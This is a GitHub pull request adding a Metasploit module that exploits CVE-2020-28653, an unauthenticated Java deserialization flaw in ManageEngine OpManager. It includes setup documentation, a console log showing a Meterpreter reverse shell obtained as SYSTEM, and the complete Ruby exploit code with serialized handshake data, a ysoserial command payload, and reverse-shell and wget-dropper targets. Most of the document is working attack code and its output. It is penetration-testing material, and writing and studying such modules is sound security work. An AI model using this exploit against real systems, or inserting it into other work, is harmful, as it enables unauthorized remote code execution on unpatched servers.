Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) #15670
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,90 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| ### Description | ||
|
|
||
| An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an | ||
| arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of | ||
| the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This vulnerability is also present in other | ||
| products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 - | ||
| 12.5.232. | ||
|
|
||
| ### Setup (Windows) | ||
|
|
||
| 1. Download an affected version for either Windows or Linux from the [archive][0] | ||
| 1. Run the installer executable | ||
| 1. Accept the default values for all settings (skip registration), until the very end when prompted to start the | ||
| application | ||
| 1. Unselect the option to start the application | ||
| 1. If this option is missed, just navigate to the tray icon where it will say that it's starting and select the | ||
| option to stop it | ||
| 1. Start a command prompt as an administrative user | ||
| 1. Navigate to `C:\Program Files\ManageEngine\OpManager\bin`, older versions use `C:\ManageEngine\OpManager\bin` | ||
| 1. Run `run.bat` | ||
| 1. View and accept the license terms | ||
| 1. Press `f` to run the product in Free mode | ||
|
|
||
| OpManager should start successfully after a few minutes. At that point the service can be exploited. In this case the | ||
| session will be opened in the context of the user that ran the service with `run.bat`. Once the server is restarted and | ||
| OpManager starts automatically, the vulnerability can be exploited to open a session in the context of NT | ||
| AUTHORITY\SYSTEM. | ||
|
|
||
| ### Setup (Linux) | ||
|
|
||
| 1. Download an affected version for either Windows or Linux from the [archive][0] | ||
| 1. Run the installer executable as root | ||
| 1. Accept the default values for all settings (skip registration) | ||
| 1. Navigate to `/opt/ManageEngine/OpManagerCentral/bin` | ||
|
There was a problem hiding this comment. Looks like older Linux versions might be under the |
||
| 1. Run `run.sh` as root | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Install the application | ||
| 1. Start msfconsole | ||
| 1. Do: `use exploit/multi/http/opmanager_sumpdu_deserialization` | ||
| 1. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload-related options as necessary | ||
| 1. Do: `run` | ||
| 1. You should get a shell. | ||
|
|
||
| ## Options | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Windows Server 2019 x64 w/ ManageEngine OpManager v12.5.174 | ||
|
|
||
| ``` | ||
| msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization | ||
| [*] Using configured payload cmd/windows/powershell_reverse_tcp | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.10 | ||
| RHOSTS => 192.168.159.10 | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell | ||
| TARGET => Windows PowerShell | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp | ||
| PAYLOAD => windows/x64/meterpreter/reverse_tcp | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128 | ||
| LHOST => 192.168.159.128 | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check | ||
| [*] 192.168.159.10:8060 - The target appears to be vulnerable. | ||
| msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.159.128:4444 | ||
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [+] The target appears to be vulnerable. | ||
| [*] An HTTP session cookie has been issued | ||
| [*] The request handler has been associated with the HTTP session | ||
| [*] Sending stage (200262 bytes) to 192.168.159.10 | ||
| [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:50295) at 2021-09-13 16:31:45 -0400 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: NT AUTHORITY\SYSTEM | ||
| meterpreter > sysinfo | ||
| Computer : WIN-3MSP8K2LCGC | ||
| OS : Windows 2016+ (10.0 Build 17763). | ||
| Architecture : x64 | ||
| System Language : en_US | ||
| Domain : MSFLAB | ||
| Logged On Users : 7 | ||
| Meterpreter : x64/windows | ||
| meterpreter > | ||
| ``` | ||
|
|
||
| [0]: https://archives.manageengine.com/opmanager/ | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,203 @@ | ||
| ## | ||
| # This module requires Metasploit: https://metasploit.com/download | ||
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| class MetasploitModule < Msf::Exploit::Remote | ||
| Rank = ExcellentRanking | ||
|
|
||
| prepend Msf::Exploit::Remote::AutoCheck | ||
| include Msf::Exploit::CmdStager | ||
| include Msf::Exploit::Remote::HttpClient | ||
| include Msf::Exploit::Powershell | ||
|
|
||
| def initialize(info = {}) | ||
| super( | ||
| update_info( | ||
| info, | ||
| 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', | ||
| 'Description' => %q{ | ||
| An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to | ||
| deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS | ||
| commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This | ||
| vulnerability is also present in other products that are built on top of the OpManager application. This | ||
| vulnerability affects OpManager versions 12.1 - 12.5.232. | ||
| }, | ||
| 'Author' => [ | ||
| 'Johannes Moritz', # Original Vulnerability Research | ||
| 'Robin Peraglie', # Original Vulnerability Research | ||
| 'Spencer McIntyre' # Metasploit module | ||
| ], | ||
| 'License' => MSF_LICENSE, | ||
| 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], | ||
| 'Platform' => [ 'win', 'linux', 'python', 'unix' ], | ||
| 'References' => [ | ||
| [ 'CVE', '2020-28653' ], # original CVE | ||
| # [ 'CVE', '2021-3287' ], # patch bypass | ||
| [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ] | ||
| ], | ||
| 'Privileged' => true, | ||
| 'Targets' => [ | ||
| [ | ||
| 'Windows Command', | ||
| { | ||
| 'Arch' => ARCH_CMD, | ||
| 'Platform' => 'win', | ||
| 'Type' => :win_cmd, | ||
| 'DefaultOptions' => { | ||
| 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' | ||
| } | ||
| } | ||
| ], | ||
| [ | ||
| 'Windows Dropper', | ||
| { | ||
| 'Arch' => [ARCH_X86, ARCH_X64], | ||
| 'Platform' => 'win', | ||
| 'Type' => :win_dropper, | ||
| 'DefaultOptions' => { | ||
| 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' | ||
| } | ||
| } | ||
| ], | ||
| [ | ||
| 'Windows PowerShell', | ||
| { | ||
| 'Arch' => [ARCH_X86, ARCH_X64], | ||
| 'Platform' => 'win', | ||
| 'Type' => :win_psh, | ||
| 'DefaultOptions' => { | ||
| 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' | ||
| } | ||
| } | ||
| ], | ||
| [ | ||
| 'Unix Command', | ||
| { | ||
| 'Arch' => ARCH_CMD, | ||
| 'Platform' => 'unix', | ||
| 'Type' => :nix_cmd | ||
| } | ||
| ], | ||
| [ | ||
| 'Linux Dropper', | ||
| { | ||
| 'Arch' => [ARCH_X86, ARCH_X64], | ||
| 'Platform' => 'linux', | ||
| 'Type' => :nix_dropper, | ||
| 'DefaultOptions' => { | ||
| 'CMDSTAGER::FLAVOR' => 'wget', | ||
| 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' | ||
| } | ||
| } | ||
| ], | ||
| [ | ||
| 'Python', | ||
| { | ||
| 'Arch' => ARCH_PYTHON, | ||
| 'Platform' => 'python', | ||
| 'Type' => :python, | ||
| 'DefaultOptions' => { | ||
| 'PAYLOAD' => 'python/meterpreter/reverse_tcp' | ||
| } | ||
| } | ||
| ] | ||
| ], | ||
| 'DefaultOptions' => { | ||
| 'RPORT' => 8060 | ||
| }, | ||
| 'DefaultTarget' => 0, | ||
| 'DisclosureDate' => '2021-07-26', | ||
| 'Notes' => { | ||
| 'Reliability' => [ REPEATABLE_SESSION ], | ||
| 'SideEffects' => [ ARTIFACTS_ON_DISK ], | ||
| 'Stability' => [ CRASH_SAFE ] | ||
| } | ||
| ) | ||
| ) | ||
|
|
||
| register_options([ | ||
| OptString.new('TARGETURI', [ true, 'OpManager path', '/']) | ||
| ]) | ||
| end | ||
|
|
||
| def check | ||
| res = send_request_cgi({ | ||
| 'method' => 'POST', | ||
| 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), | ||
| # Serialized int 1002 | ||
| 'data' => "\xac\xed\x00\x05\x77\x04\x00\x00\x03\xea".b | ||
| }) | ||
| return Exploit::CheckCode::Unknown unless res | ||
| # the patched version will respond back with 200 OK and no data in the response body | ||
| return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?("\xac\xed\x00\x05".b) | ||
|
|
||
| Exploit::CheckCode::Appears | ||
| end | ||
|
|
||
| def exploit | ||
| # Step 1: Establish a valid HTTP session | ||
| res = send_request_cgi({ | ||
| 'uri' => normalize_uri(target_uri.path), | ||
| 'keep_cookies' => true | ||
| }) | ||
| unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/ | ||
| fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session') | ||
| end | ||
| print_status('An HTTP session cookie has been issued') | ||
|
|
||
| # Step 2: Add the requestHandler to the HTTP session | ||
| res = send_request_cgi({ | ||
| 'method' => 'POST', | ||
| 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), | ||
| 'keep_cookies' => true, | ||
| # Serialized int 1002 | ||
| 'data' => "\xac\xed\x00\x05\x77\x04\x00\x00\x03\xea".b | ||
| }) | ||
| unless res&.code == 200 | ||
| fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session') | ||
| end | ||
| print_status('The request handler has been associated with the HTTP session') | ||
|
|
||
| # Step 3: Exploit the deserialization vulnerability to run commands | ||
| case target['Type'] | ||
| when :nix_dropper | ||
| execute_cmdstager | ||
| when :win_dropper | ||
| execute_cmdstager | ||
| when :win_psh | ||
| execute_command(cmd_psh_payload( | ||
| payload.encoded, | ||
| payload.arch.first, | ||
| remove_comspec: true | ||
| )) | ||
| else | ||
| execute_command(payload.encoded) | ||
| end | ||
| end | ||
|
|
||
| def execute_command(cmd, _opts = {}) | ||
| # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the | ||
| # dependency on the commons-collections library making it usable in this context | ||
| case target['Platform'] | ||
| when 'python' | ||
| cmd.prepend('python -c ') | ||
| when 'win' | ||
| cmd.prepend('cmd.exe /c ') | ||
| else | ||
| cmd.gsub!(/\s+/, '${IFS}') | ||
| cmd.prepend('sh -c ') | ||
| end | ||
zeroSteiner marked this conversation as resolved.
Show resolved
Hide resolved
|
||
|
|
||
| vprint_status("Executing command: #{cmd}") | ||
| java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd) | ||
|
|
||
| res = send_request_cgi({ | ||
| 'method' => 'POST', | ||
| 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'), | ||
| 'keep_cookies' => true, | ||
| 'data' => [ java_payload.length ].pack('N') + java_payload | ||
| }) | ||
| fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200 | ||
| end | ||
| end | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Named to point to frohoff/ysoserial#168 so both PRs can move forward independently of each other.